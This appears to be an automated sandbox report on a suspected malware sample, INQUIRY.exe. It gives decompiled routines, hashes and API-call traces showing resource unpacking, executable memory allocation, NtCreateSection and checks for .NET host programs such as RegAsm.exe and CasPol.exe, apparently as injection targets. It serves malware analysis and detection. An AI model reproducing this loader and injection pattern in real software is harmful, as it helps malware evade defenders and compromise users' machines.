                                                                        0x00446945
                                                                        0x00446956
                                                                        0x00446947
                                                                        0x0044694c
                                                                        0x0044694c
                                                                        0x0044695d
                                                                        0x00446964
                                                                        0x00446964
                                                                        0x0044696b
                                                                        0x0044696b
                                                                        0x00446974

                                                                        APIs
                                                                        • CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        • CreateMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateMenu$Popup
                                                                        • String ID: LVD
                                                                        • API String ID: 257293969-462541549
                                                                        • Opcode ID: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction ID: 06d8af0e65ff4525c3f7fd11a64e48488f021198afdba98e41057e88a90e2ea7
                                                                        • Opcode Fuzzy Hash: d9d0badce4ef86591aa20f7282ffbf1034a79afcf9c0626e2ed873ef2ebc2a63
                                                                        • Instruction Fuzzy Hash: B4E0C9B0202200DBEF50FF65D5C16053BA4AB05319F92647FA8455B257C678D8858B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00433790, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00433790(intOrPtr __eax) {
				intOrPtr _t5;
				intOrPtr _t10;
				intOrPtr _t11;

				_t10 = __eax;
				ReleaseCapture();
				_t5 = 0;
				 *0x47a96c = 0;
				if(_t10 != 0) {
					_t11 =  *0x4323f0; // 0x43243c
					_t5 = E00403768(_t10, _t11);
					if(0 != 0) {
						L4:
						return SetCapture(E0043CC2C(_t10));
					}
					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
						 *0x47a96c = _t10;
						_t10 =  *((intOrPtr*)(_t10 + 0x30));
						goto L4;
					}
				}
				return _t5;
			}






                                                                        0x00433791
                                                                        0x00433793
                                                                        0x00433798
                                                                        0x0043379a
                                                                        0x004337a1
                                                                        0x004337a5
                                                                        0x004337ab
                                                                        0x004337b2
                                                                        0x004337c3
                                                                        0x00000000
                                                                        0x004337cb
                                                                        0x004337b8
                                                                        0x004337ba
                                                                        0x004337c0
                                                                        0x00000000
                                                                        0x004337c0
                                                                        0x004337b8
                                                                        0x004337d1

                                                                        APIs
                                                                        • ReleaseCapture.USER32(00000000,00436809,0000FFB8,?,0045FE8A), ref: 00433793
                                                                        • SetCapture.USER32(00000000,00000000,00436809,0000FFB8,?,0045FE8A), ref: 004337CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Capture$Release
                                                                        • String ID: <$C
                                                                        • API String ID: 1520983071-3423417450
                                                                        • Opcode ID: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction ID: f69f079f5be23d6e1fa85a04827f5d80959cc3868215f43c1aed832baa5a6738
                                                                        • Opcode Fuzzy Hash: 069273d8fa48293c893d9ce74b54af7ed5dc040ff898934071bb15314ed0582d
                                                                        • Instruction Fuzzy Hash: 33E046F070030087DB10AF7A98C16073298BB4C306F44A87FAD08AB393C77CD995CA59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00434370, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00434370(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E00434328(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}





                                                                        0x00434371
                                                                        0x0043437b
                                                                        0x0043437f
                                                                        0x00434381
                                                                        0x00434392
                                                                        0x00434396
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434396
                                                                        0x00434381
                                                                        0x00434398
                                                                        0x0043439b

                                                                        APIs
                                                                        • WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434328: GlobalFindAtomA.KERNEL32 ref: 0043433C
                                                                          • Part of subcall function 00434328: GetPropA.USER32 ref: 00434353
                                                                        • GetParent.USER32(00000000), ref: 0043438D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                        • String ID: YBC
                                                                        • API String ID: 3524704154-2981556608
                                                                        • Opcode ID: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction ID: 7a30522fa15226b405c8248a6cc35b0061ab833cb262d2683d9bbae8bf9d1630
                                                                        • Opcode Fuzzy Hash: 97dfd7ec3a7724f91f9af8ce4d5fb9e7f174329956de61e1e1a8bb4ec22f11bd
                                                                        • Instruction Fuzzy Hash: 62D0C7513003035B9F152AF65DC195A664C9FAD349B02247EBD415B623DE6DDC19531C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: INQUIRY.exe PID: 5896 Parent PID: 2016 INQUIRY.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00490159, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00490186
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateSection
                                                                        • String ID:
                                                                        • API String ID: 2449625523-0
                                                                        • Opcode ID: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                        • Instruction ID: ed1f788a04a4fc99dfff4fe9cab51899918aac264c76607bbf74846170423289
                                                                        • Opcode Fuzzy Hash: 7d616a8db5d0448a1420d80fb182250f662ec4d9038a6abcd0da5041a7f62d4b
                                                                        • Instruction Fuzzy Hash: 6BF04F36101519AFCF029F95EC0089B3BA9FB5A360718443AFA15D7220CB3AD821DFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F4F3, Relevance: 31.6, APIs: 3, Strings: 15, Instructions: 81libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad$_memset
                                                                        • String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
                                                                        • API String ID: 240438931-1803115895
                                                                        • Opcode ID: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                        • Instruction ID: c0dabbacc67b2d426725778b490ac06bdd95f5667b4ab04c32cf67e49d091f9b
                                                                        • Opcode Fuzzy Hash: 73c82d8e3b47b951a9f4cc2f9c00e8973089907e2b92cb79419427843c3ae47d
                                                                        • Instruction Fuzzy Hash: 1D315AB1811219FBCF10DF98DA485EEBBB4EF48318F108466E405BB200D3B89A49CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004907C7, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 187memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00490039: GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                          • Part of subcall function 00490039: FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                          • Part of subcall function 00490039: SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                          • Part of subcall function 00490039: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                          • Part of subcall function 00490039: LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                          • Part of subcall function 0048FED9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00490848
                                                                        • VirtualProtect.KERNEL32(00000000,00001000,00000004,?), ref: 00490868
                                                                          • Part of subcall function 0048FF82: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                        • _memset.LIBCMT ref: 0049089F
                                                                          • Part of subcall function 0048F834: _memset.LIBCMT ref: 0048F869
                                                                        • _memset.LIBCMT ref: 004908F7
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00490919
                                                                        • _memset.LIBCMT ref: 00490945
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0049097B
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0049099D
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000104), ref: 004909DA
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY.exe,00000104), ref: 004909E7
                                                                        • CloseHandle.KERNEL32 ref: 00490A54
                                                                        Strings
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 004909CF
                                                                        • `I, xrefs: 00490825
                                                                        • C:\Users\user\Desktop\INQUIRY.exe, xrefs: 004909E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: File$ModuleVirtual_memset$AllocHandleResource$Name$CloseCreateExistsFindLoadPathProtectSizeSizeof
                                                                        • String ID: `I$C:\Users\user\Desktop\INQUIRY.exe$C:\Users\user\Desktop\INQUIRY.exe
                                                                        • API String ID: 3419322617-1156463312
                                                                        • Opcode ID: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                        • Instruction ID: fa47b57a85d087020d92033c6ce2aeeea61bb3e428919a219cd19c41fd7a2f06
                                                                        • Opcode Fuzzy Hash: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                        • Instruction Fuzzy Hash: 4461A131900258EFCF21EBA1DC85AAE3BA8FB34305F14147BE505E2261D7788A85CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048FB12, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 165fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFile_memset
                                                                        • String ID: C:\Users\user\Desktop\INQUIRY.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
                                                                        • API String ID: 3830271748-1189975745
                                                                        • Opcode ID: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                        • Instruction ID: 27948e0b197ab65fc848057314db705bc747f7ae27c3443865b2f1a2557d49c9
                                                                        • Opcode Fuzzy Hash: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                        • Instruction Fuzzy Hash: 8C51AF5161011A96CF20BF24CC11AFB3662BB34B94B944A77DC4587358F72BDA8AC368
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F6F4, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 110registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0048F71D
                                                                        • _memset.LIBCMT ref: 0048F744
                                                                        • RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0048F76D
                                                                        • _memset.LIBCMT ref: 0048F78B
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00496000,000000FF,?,00000104), ref: 0048F7A9
                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0048F829
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
                                                                        • String ID: InstallRoot$Software\Microsoft\.NETFramework
                                                                        • API String ID: 3047945766-4217373442
                                                                        • Opcode ID: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                        • Instruction ID: e213da734bf04768acd83674f95f575279fa158ac3039e7ac73ccee881e432fb
                                                                        • Opcode Fuzzy Hash: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                        • Instruction Fuzzy Hash: 7331D472A0021AABDB20AB949C45BEFB7F8EF44754F1041B7F905E3250E7B45E84CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F60E, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ExistsFilePath_memset
                                                                        • String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
                                                                        • API String ID: 4214796376-2149642370
                                                                        • Opcode ID: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                        • Instruction ID: e67d0945219b46a94c3d569c8aac3861b262f67e8beb429f0986b9de818479d6
                                                                        • Opcode Fuzzy Hash: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                        • Instruction Fuzzy Hash: 36219731900209AACF11EFA8D9546FE77B4FF45345F004576E846E7211F7744E4A9B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004901BE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 004901FD
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                        • String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
                                                                        • API String ID: 1620000358-1444991907
                                                                        • Opcode ID: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                        • Instruction ID: db1a365c1f949f841781de154625547609794dc9d783144385055322e9d575ed
                                                                        • Opcode Fuzzy Hash: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                        • Instruction Fuzzy Hash: F14187116101129ECF70AF34CC49AF73A669F34BA4B8446B6DC55CB399F72ACE85C358
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048FD94, Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0048FD9D
                                                                          • Part of subcall function 0048904F: __FF_MSGBANNER.LIBCMT ref: 00489072
                                                                          • Part of subcall function 0048904F: __NMSG_WRITE.LIBCMT ref: 00489079
                                                                          • Part of subcall function 0048904F: RtlAllocateHeap.NTDLL(00000000,?), ref: 004890C6
                                                                        • VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 0048FDB4
                                                                        • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048FDC2
                                                                        • _memset.LIBCMT ref: 0048FE03
                                                                        • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048FE14
                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048FE1C
                                                                        • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048FE23
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
                                                                        • String ID:
                                                                        • API String ID: 851286602-0
                                                                        • Opcode ID: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                        • Instruction ID: bcffd8cd40d6532149c6807460895040980dc854defc66bebcdc605edb1d7188
                                                                        • Opcode Fuzzy Hash: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                        • Instruction Fuzzy Hash: 7D21B0B6500245AFC711DFA8DD88DAE7BBCEB55600B01467BF60AC62A2E734D604CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00490039, Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                        • FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004900AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
                                                                        • String ID:
                                                                        • API String ID: 3588284000-0
                                                                        • Opcode ID: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                        • Instruction ID: 5ff3337369aea6f0979f138135c280e8d1317291e8a5e21f8052689e222425fe
                                                                        • Opcode Fuzzy Hash: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                        • Instruction Fuzzy Hash: 0401A2757403027FEB322B657C49F6B3A6CAF55B85F100032FB01E5290EAA9CD00427A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004903B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 004903D2
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                          • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                          • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                          • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        • LoadLibraryExW.KERNEL32(?,?,?), ref: 004903F2
                                                                        • StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00490402
                                                                          • Part of subcall function 004900F0: CloseHandle.KERNEL32 ref: 004900FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
                                                                        • String ID: \system.ni.dll
                                                                        • API String ID: 2189784845-482435895
                                                                        • Opcode ID: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                        • Instruction ID: 73b4f87d6250eb690caff7364d9c7fdd069252db4ca6b9fb13f5fea0bc35386b
                                                                        • Opcode Fuzzy Hash: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                        • Instruction Fuzzy Hash: 08F08231900218BBCF11BFA4CC0AE9F3BACAF14340F004476BE15D6162EA35CA609BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F89E, Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                        • EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                        • GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                        • GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
                                                                        • String ID:
                                                                        • API String ID: 3431743260-0
                                                                        • Opcode ID: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                        • Instruction ID: 602899437411f3f68849e07e5ee4a6251060a2c53d2113e09e653eef3ff0685e
                                                                        • Opcode Fuzzy Hash: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                        • Instruction Fuzzy Hash: 4621627154010ABBDF10FB98C985AEEB779EF14344F104876E541E2150D774AE5ACB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F46C, Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                        • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                        • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                        • String ID:
                                                                        • API String ID: 4115577372-0
                                                                        • Opcode ID: 357a6ccdaf2061e3b522f9c7a71ce9dc8d1bf9ab169af0b1ebaa76324d94e6f3
                                                                        • Instruction ID: 51a07170961e743bd5fb1dd18126475859709b2081fb9dcf01c7a62811403f03
                                                                        • Opcode Fuzzy Hash: 357a6ccdaf2061e3b522f9c7a71ce9dc8d1bf9ab169af0b1ebaa76324d94e6f3
                                                                        • Instruction Fuzzy Hash: B8F0ADB640020ABBCF116FA4CD48ADF7E6CEB14350F004627BA09911A0E735DA44CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048FE5D, Relevance: 4.6, APIs: 3, Instructions: 53libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: 5b878c4c937de1d72927c3407b9a5848f36b7b1d96b447510dbb1619dd0fa58a
                                                                        • Instruction ID: cb2e00d2c6e3853fe0690655ee8cf266d6c85da39317ad3d0deaead56c4eab32
                                                                        • Opcode Fuzzy Hash: 5b878c4c937de1d72927c3407b9a5848f36b7b1d96b447510dbb1619dd0fa58a
                                                                        • Instruction Fuzzy Hash: 0C112771600216ABDB20EF59C8809BF77E8AF1435471104BAE901E7222F738EE49CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048ABD8, Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,004891FB), ref: 0048ABDB
                                                                        • __malloc_crt.LIBCMT ref: 0048AC09
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048AC16
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                        • String ID:
                                                                        • API String ID: 237123855-0
                                                                        • Opcode ID: 908fed19b57f6dbd9b02f5b763521e8ef6996606c57118f80aff5c2c23133449
                                                                        • Instruction ID: 3a599f4cd9a5c1bb63ea8aefedf48ca199ddadc71bbd2992ba8cef025ee73401
                                                                        • Opcode Fuzzy Hash: 908fed19b57f6dbd9b02f5b763521e8ef6996606c57118f80aff5c2c23133449
                                                                        • Instruction Fuzzy Hash: 1AF0E9379040605EA7117A353C4847F166DDA863293164C37F553C3200FA984CD383AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0049034A, Relevance: 4.5, APIs: 3, Instructions: 43libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?), ref: 00490366
                                                                        • LoadLibraryA.KERNEL32(?), ref: 00490373
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00490381
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: 48eb0c92a0b51a578db5699f46632ddc89d3dd394b6964f041acfbe2229c28b2
                                                                        • Instruction ID: 76261a61f0ed5c90047b1746fe55b54294cf88d7536e13bfaf44e409294aea42
                                                                        • Opcode Fuzzy Hash: 48eb0c92a0b51a578db5699f46632ddc89d3dd394b6964f041acfbe2229c28b2
                                                                        • Instruction Fuzzy Hash: D0F0A932820228EFCF326F70EC448DF7F69AB40B517208537FC4692125E73989919AC8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048F9E9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0048FA13
                                                                          • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
